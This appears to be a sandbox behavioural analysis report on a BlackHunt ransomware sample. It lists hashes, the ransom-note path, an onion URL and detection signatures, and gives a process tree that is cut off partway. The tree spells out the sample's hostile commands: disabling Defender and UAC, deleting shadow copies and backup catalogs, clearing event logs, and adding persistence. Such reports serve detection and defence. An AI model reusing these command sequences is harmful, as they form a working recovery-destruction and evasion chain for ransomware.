Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel: 117s
max time network: 118s
platform: windows7_x64
resource: win7-20231129-en
resource tags: arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
submitted: 18/01/2024, 23:21
Static task: static1
Behavioral task: behavioral1
  Sample: 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe
  Resource: win7-20231129-en
Behavioral task: behavioral2
  Sample: 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe
  Resource: win10v2004-20231215-en
General
Target: 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe
Size: 707KB
MD5: 381c0731d3af5fb29d1d07ba29b1a747
SHA1: 4c101e7fc3203a98f845abcce55f45f3caed89fe
SHA256: 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4
SHA512: 44a26772c284e93679e61d85fae232b476a809e11e90c8676a7cbf14d60f3c8a2ec088bdf6249e70bf8ad7208c8785f014bce57223c3ecd599377bb80ac63e15
SSDEEP: 6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1R8Avnh:6uaTmkZJ+naie5OTamgEoKxLWEeh
Malware Config
Extracted
C:\Program Files\DVD Maker\en-US\#BlackHunt_ReadMe.hta
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
Deletes NTFS Change Journal (2 TTPs, 2 IoCs)
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
  PID 2000 fsutil.exe
  PID 5864 fsutil.exe
Modifies Windows Defender Real-time Protection settings
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" (reg.exe)
  Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection (reg.exe)
UAC bypass
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe)
Clears Windows event logs (1 TTPs, 5 IoCs)
  PID 5688 wevtutil.exe
  PID 5712 wevtutil.exe
  PID 5788 wevtutil.exe
  PID 5796 wevtutil.exe
  PID 5596 wevtutil.exe
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
Modifies boot configuration data using bcdedit (1 TTPs, 4 IoCs)
  PID 3004 bcdedit.exe
  PID 2240 bcdedit.exe
  PID 5644 bcdedit.exe
  PID 5716 bcdedit.exe
Renames multiple (2871) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
Process IoCs: PID 880 wbadmin.exe, PID 5568 wbadmin.exe
Disables Task Manager via registry modification
Disables use of System Restore points (1 TTPs)
Deletes itself (1 IoCs)
  PID 5756 cmd.exe
Adds Run key to start application (2 TTPs, 1 IoCs)
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" (reg.exe)
Checks whether UAC is enabled
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe)
Enumerates connected drives (3 TTPs, 27 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
  File opened (read-only) by 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe: \??\G:, \??\U:, \??\P:, \??\O:, \??\N:, \??\M:, \??\R:, \??\H:, \??\J:, \??\V:, \??\K:, \??\L:, \??\B:, \??\E:, \??\T:, \??\Y:, \??\A:, \??\I:, \??\Z:, \??\Q:, \??\W:, \??\S:, \??\X:
  File opened (read-only) by fsutil.exe: \??\F:, \??\M:
  File opened (read-only) by vssadmin.exe: \??\F: (two entries)
Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 2: ip-api.com
Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  Set value (str) \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" (51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe)
Drops file in Program Files directory (64 IoCs)
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  PID 2696 schtasks.exe
Interacts with shadow copies (2 TTPs, 6 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
  PID 1560 vssadmin.exe
  PID 5636 vssadmin.exe
  PID 2616 vssadmin.exe
  PID 3136 vssadmin.exe
  PID 1460 vssadmin.exe
  PID 2188 vssadmin.exe
Kills process with taskkill (1 IoCs)
  PID 5500 taskkill.exe
Modifies registry class (10 IoCs)
  Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon (reg.exe)
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" (reg.exe)
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" (reg.exe)
  Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 (reg.exe)
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ (reg.exe)
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ (reg.exe)
  Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon (reg.exe)
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 (reg.exe)
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon (reg.exe)
  Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 (reg.exe)
Runs ping.exe (1 TTPs, 1 IoCs)
  PID 5896 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  PID 6008 mshta.exe
Suspicious use of AdjustPrivilegeToken (24 IoCs)
  PID 2860 51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe: SeDebugPrivilege, SeRestorePrivilege, SeBackupPrivilege, SeTakeOwnershipPrivilege, SeAuditPrivilege, SeSecurityPrivilege, SeIncBasePriorityPrivilege
  PID 2248 vssvc.exe: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
  PID 2512 wbengine.exe: SeBackupPrivilege, SeRestorePrivilege, SeSecurityPrivilege
  PID 5712 wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
  PID 5788 wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
  PID 5688 wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
  PID 5796 wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
  PID 5596 wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
  PID 5500 taskkill.exe: SeDebugPrivilege
Suspicious use of WriteProcessMemory (64 IoCs)
System policy modification (1 TTPs, 3 IoCs)
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" (51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe)
  Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System (51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe)
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe)
Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
C:\Users\Admin\AppData\Local\Temp\51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe (PID 2860)
  Command line: "C:\Users\Admin\AppData\Local\Temp\51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe"
  - UAC bypass
  - Checks whether UAC is enabled
  - Enumerates connected drives
  - Sets desktop wallpaper using registry
  - Drops file in Program Files directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - System policy modification
  C:\Windows\System32\cmd.exe (PID 3040)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe (PID 2568)
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
      - Modifies registry class
  C:\Windows\System32\cmd.exe (PID 2948)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe (PID 2684)
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      - Modifies registry class
  C:\Windows\System32\cmd.exe (PID 2144)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe (PID 2128)
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
      - Modifies registry class
  C:\Windows\System32\cmd.exe (PID 2604)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe (PID 2712)
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      - Modifies registry class
  C:\Windows\System32\cmd.exe (PID 2700)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe (PID 2492)
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
      - Adds Run key to start application
  C:\Windows\System32\cmd.exe (PID 2612)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (PID 2532)
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
  C:\Windows\System32\cmd.exe (PID 2692)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (PID 1988)
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
      - Modifies Windows Defender Real-time Protection settings
  C:\Windows\System32\cmd.exe (PID 2420)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
    C:\Windows\system32\reg.exe (PID 2888)
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
  C:\Windows\System32\cmd.exe (PID 2644)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (PID 1672)
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
  C:\Windows\System32\cmd.exe (PID 2732)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
    C:\Windows\system32\reg.exe (PID 1772)
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
  C:\Windows\System32\cmd.exe (PID 2632)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
    C:\Windows\system32\reg.exe (PID 2220)
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
  C:\Windows\System32\cmd.exe (PID 2464)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
    C:\Windows\system32\reg.exe (PID 1700)
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
  C:\Windows\System32\cmd.exe (PID 2516)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
    C:\Windows\system32\reg.exe (PID 1660)
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
  C:\Windows\System32\cmd.exe (PID 2580)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (PID 1192)
      Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
  C:\Windows\System32\cmd.exe (PID 2184)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (PID 956)
      Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
  C:\Windows\System32\cmd.exe (PID 2884)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (PID 2308)
      Command line: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
  C:\Windows\System32\cmd.exe (PID 3068)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2180
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2776
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1884
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2016
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2008
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:960
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:852
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1848
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:1176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1512
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2500
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2768
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2236
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe" /F2⤵PID:972
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe" /F3⤵
- Creates scheduled task(s)
PID:2696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:596
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:268
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:108
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1372
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1072
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:580
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:784
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2360
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2380
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1876
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:1668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:5440
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:5392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:5428
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:5336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:5344
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:5400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:4400
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:5212
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:4628
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:5844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:4904
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:5652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:5124
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:5508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:5360
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:5832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:996
-
